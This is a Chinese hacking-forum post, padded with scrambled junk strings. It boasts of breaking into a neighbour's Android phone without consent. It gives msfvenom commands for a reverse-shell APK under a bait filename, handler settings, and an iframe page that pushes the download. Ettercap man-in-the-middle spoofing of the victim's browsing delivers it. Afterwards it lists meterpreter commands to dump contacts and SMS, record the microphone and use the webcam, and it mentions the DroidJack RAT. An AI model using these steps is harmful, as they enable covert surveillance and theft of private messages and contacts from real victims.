找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1825|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 V1 W5 Z# s0 ?9 P! U% P+ p! E! D 五、msf+ettercap入侵邻居安卓手机 0 Z$ j9 Y- F+ K

- [7 v" C A7 i. m/ q# U, p

" n& |" i+ p3 p% w3 \; B/ E# p 首先启动msf - Q) G3 @; c' ]; _6 g( E; q

; g# q* `3 p: J: W* S& Z0 \

" C4 P7 @" z2 F5 y' w- p. s 先用kali生成一个安卓木马,如下命令: @' Q, w8 B5 d7 o7 n7 g8 _5 m: Q

" }0 i( x; G2 R; M2 q4 v

# _6 {* d- L( ~4 v Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 8 G: z2 X |- p! A2 b6 i

. t0 d+ s- d6 p/ b( P6 @ I, Y

6 T. W: K( q& V* s& n% x m A y 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 / U4 h; V+ \2 c+ @

" `% w% A' I, r; {

9 m; V" n) s7 s0 h8 |! s# L, F 然后进入msf ' Q" y- v4 Q3 E+ a+ c0 L8 D

9 V2 l3 e9 n! B. R8 v

b7 P1 l; Z5 F6 d use exploit/multi/handler ) I3 T0 w& |; `% f# \; w: t8 q: B' q1 l' A

4 B5 [1 l+ e; }! }- f6 d, g( g

/ v% ?" Q: H2 `. p4 W4 o9 P set payload android/meterpreter/reverse_tcp " z' C& |7 ^' T$ Q3 `9 ~+ z6 n

# v4 u# l; h4 E

, B9 l6 ^9 R; l" ` set LHOST 192.168.0.109 //ipkailiip 5 H* j8 p; r" u

^" R2 X9 I3 { }/ e- t

7 a' R& k5 Q! {: k set LPORT 44444 //端口一定要与前面生成的木马的端口一致 " L* K6 L6 X1 K

, a x) e5 {+ q4 `0 ], B

- t; ^! ~2 N1 ^, J Exploit * D* C6 D. a0 h6 K) I( A

6 l9 F1 Z- k5 Y7 Y( k

, R$ e) R. I5 F& {$ o: q   ' z; `. A! p5 D p

$ g; y* p- {4 o+ U& |! x. a. w2 b

8 j+ T+ Y% n. n+ [' f 下面我们开启ettercap -G ( I1 j! W f9 |5 W7 w

C2 E! h8 Z. ?& W" M. {$ o) n$ Y

8 G1 m3 }1 u y/ W! y, [ 我物理IP 1 _% v$ }) O: R# s/ ?0 F

& U% f$ M1 D6 B1 t4 U

4 c. a8 d: {- C2 R1 e) Q9 j$ H6 V; E   5 J, S U+ s1 d" L4 a

: O7 H: ~, ^$ Y) G

: g; w# S. F+ O1 ?8 [1 e' X 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 4 T9 _: n2 h1 s1 k3 \

. R6 g9 Q1 J. U. R( s* n" r

) V$ ^- `8 c9 _- _! c. a# v2 ^: o 下面我们来设置一下 ) d( o/ C2 M0 s! v/ Y$ b/ U& {

5 ?4 O4 l2 |* F0 t$ t* S: n* [3 P

, K6 ~4 u: i# \5 ] }   , e9 |) _# A2 r9 S6 D

9 X8 A2 i7 x1 V) I7 w- ?3 K4 X

7 b6 P' s, c9 y 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, : d) z0 Y- E; o

: T# }- q! X: f; r+ T. D

+ J2 M, E8 d1 q- a, `% Y5 ~3 K6 m1 l   . a1 j. J- D: D; f

4 J" i0 p3 G/ S, a+ O

4 D" m! {5 C- ?$ [# }   0 s! \) O2 p G( b& D+ b! d! b

' X" q5 _4 f% \' q3 y0 Z2 c# R2 ]

7 P- @) R$ b9 J- L# p, e) Q   * W7 p' |* q+ A3 B( N2 i- Y; p

: b& x3 h. q: y6 ?3 s

6 Q9 T% V. \$ l" S3 r   6 e/ |0 A. {/ t$ V2 P. k) @1 P

2 o3 Z5 B! d: S* T( A$ ~

7 W2 A2 o# k. O9 ]2 B2 P4 d   5 i2 \; j, V* h; P5 S4 g" t3 j

2 z# B% Y! D, e P% d

6 M5 N, [8 ]' e' B0 x   6 o) q8 D; w( G. [/ E- ~3 ~

& m X$ Z8 ^% I j/ W

3 E2 y/ l* Z) W5 w- g- s& x   7 P- E1 V9 s. ~/ G+ d* b

5 o( \% q3 f- y$ _# w- ?

1 l3 V- ^. I( V8 p( H& Q   1 _2 h. Y" j) [- e9 J

% g7 V; P: o" A5 {

p* Z, ^& u U/ y% L   - o9 d: E, Z- e& x4 a% [7 T

, a, w" f% J# }

, V9 O8 ?; o. d' m6 y' T. i( i* m   9 U. q7 a) ~# r1 m6 Y

5 H. M0 `' e( F/ ~

+ C3 o2 d0 Q2 x   # `* r8 v2 n0 Z$ h) |. |8 }1 N

. t/ S/ J/ v: v7 }' c

( I% {' P0 `3 h5 ^/ I) K1 n   4 Z% m4 M5 Q3 `9 u7 j4 `$ t

; p, e7 {' _6 [" b

: z# J9 a' }) y' D   7 \ m$ T1 J/ ]7 \$ D4 w

" ~; I$ X7 K7 M! W6 P$ r# t7 t* R& K

7 C/ O8 `( |4 G 下面我们开始攻击 ' ^+ W" U5 L( G" l2 n

' Z6 q/ y) d) \- U

; H" k! v5 I6 a5 Y   * A/ J1 n* c. f/ Z

' N+ K7 O' P6 b/ p

/ x ?+ @4 ]& A" c! O# b4 J; G   : W- E/ u5 R) f; B- R

- x2 t, {# o7 e+ v. {3 U5 y2 @) D

3 q$ h4 e0 ~4 M/ n+ V# M4 R   0 Q; Q5 _- S: ?; b1 P6 D% O

& i" _9 h" H) b+ P1 l' i. H

, a# {( }6 e, b# {5 X   8 Y& [' q& V* _

; ?( S3 P n* j4 e0 ^. N3 f

, T% L' }# ^+ m   5 r) V4 j, [3 N4 k3 S

: g6 e% b4 A6 Y0 C

+ n" I4 ]. G" N 大概过了5分钟多,发现反弹成功了 , ~ |0 x2 d- M# r! \: U

6 a+ P9 }/ _) B3 t ~% S+ K

+ J2 ?& Z2 r/ E; s2 g8 j0 J+ ^   ( ]# {, L2 x+ Z- Y5 X

6 G/ i7 S" }: @) H: a0 B

1 N1 [6 T) m6 G, D o5 z   3 S8 J2 E1 G t9 F8 x0 |$ t3 @

% k \/ _! w& g7 w! |$ I

; f: _7 d! H {) g2 D# S   1 B: y R2 N( l& h# m

! N# ]# T) Z) S1 V

1 n4 I4 {) W8 G9 S" ~1 m! [   : E6 d% u- }; z# x4 r( a h" ~

( c$ E+ [* |# z3 ?% r

4 f( g5 K7 L5 F8 o$ m4 ~   8 d6 K" O' a% \8 K1 |

4 j. v* Z6 Q9 u3 l& W4 y/ Z

" l8 b5 O0 K( O/ A   ) e, O: f7 d# |

_( ` `" a4 } U2 ?* ? @

0 V6 M3 k) U2 A" s' `# |   ; U/ D0 D+ {9 I) @

2 h- r; k8 X# B! x

+ C. X( o" H8 } 执行命令 5 w# B5 |5 T6 i8 ?1 `" Z

/ M* I0 }/ }9 ]

1 A. e) m4 I" u" a   4 \. A H+ k5 }, h

, ~7 k2 F/ R4 K6 D/ J

7 D4 H) p; U' T6 w dump_contacts    --》这个是导出电话 # R0 r* N+ p+ l7 j* y

' a% A; e7 M5 k( Z# j+ _7 ^

& n6 [% V" `6 T dump_sms --》这个是导出信息 4 H$ u* d; D* J6 Y% D! X

3 |. B, b$ i+ F/ ]% N

5 k7 Y& D; s& U1 _9 y2 O, }4 R record_mic     Record audio from the default microphone for X seconds " z: \+ N4 `8 a

# G" _7 h+ n' x4 p2 {( f

7 J' s; t- q: c6 U     webcam_chat    Start a video chat 4 j% U5 z9 b3 d6 W- H# G R

: h4 ~! _) `9 a8 ~0 Q7 e

/ j9 o4 d ?% N2 \     webcam_list    List webcams % {! |# B' V m- c

8 P& s% k% G# Y/ n

/ J9 z2 w. p% A     webcam_snap    Take a snapshot from the specified webcam & T% v; w) E( K& @9 b2 R: K. L8 {

- y4 W, I$ Q0 r/ R6 ]( p5 q

- b9 O% e# q1 J. y" n/ X webcam_stream  lay a video stream from the specified webcam % ~; C' }. a4 E9 m: w o! Z. C

! j+ Y9 {. a- V

) F, B. P2 E# O( C( E: j   ! q3 e, _8 o. p; x; o; H* K

# N* ]) F+ C/ D) b8 @

9 `+ K7 g; I. a   " C6 ~4 h4 x& ~4 f, D, {& ~

9 y1 m( E* }7 _; {3 V

, J7 N' p: A6 U" @0 E2 p* m) E7 I5 S L$ v 我们打开看一下电话薄, 2 O1 B1 u6 O, Q) D b

3 U( e$ _) z: j6 Z

, l# C4 _6 V# r1 Q9 H   1 L/ l9 z/ B5 k* `/ D/ m

8 C4 K X s5 b6 S) @, R

. {- T; A; Q) u' V5 P, _6 f7 @   % }0 v. Y! a8 s( C' J% g7 h

- H( e' |9 E3 D( ~0 Z6 Y# S

2 B& u3 M3 y8 I1 }% c2 k/ H   & _7 d3 n/ N1 o3 g, g- `; e" p3 G

9 a$ d+ i7 h; ^

8 S6 T8 w0 u! E   + M$ _7 X; F9 x- C

$ s/ \7 C5 C7 @* y% B

$ O. m& S7 n9 u: _   + x2 q4 e4 {* B3 k

8 F+ V- ~9 f8 e1 r) `

4 i5 e+ [. F; g; z+ B2 [9 v   3 f* m- |4 n1 m2 [+ } Y. J

9 s: I9 s8 E4 W! Y& i- Z- ~9 n

- ]9 ]7 z! @% o$ Z 我们同时欺骗成DroidJack木马,使用方法如图: $ |' J7 a& L+ c0 W3 Q

6 l7 M; H* ?2 b' i% g" q

0 v) E6 _' ~# x1 h( F   , W& t: Y @* [8 U

4 ?2 x. K9 b) h3 q$ q) E

J o9 u2 h7 S0 Y' }4 [   $ V. F2 |; z8 |8 l! h. m& A2 h& G

7 y6 z+ Y( A [% S8 F

/ ~1 e. i9 m! u) R9 {* ?* U   ; B8 f% [0 q, ~' V0 K( h

! a- S0 r5 y6 c7 @: X }- t

% ?+ |/ T% j6 W$ |0 h 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 - ~8 Y; j7 E2 {& B

8 H6 V, P( a+ G8 r( `

# W- Q! K' S; P/ V- _7 a4 H% `$ s   2 N h/ S) t4 f5 z$ }

" \. Y! l) g* O: R+ h' [6 w5 j

) o- V# w3 R/ p7 y   ) `7 ^3 E/ Y1 v' U$ Y1 t7 I/ s

6 b/ ?: w P; i$ G: x- H7 C* R

: K5 `1 V9 K' c' m n9 o   ( O3 `. t0 _% N8 A

+ o( j' ?# L3 t

) z+ W$ S! u7 ?) g" I5 Z8 k# _( [ % b* h6 g) h T$ z# [) u: I

" U: P% x( J3 X6 Q7 w0 h

8 ?3 n( X# ^$ o
% Y: b! b$ D; \4 l9 P) _9 I6 P

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表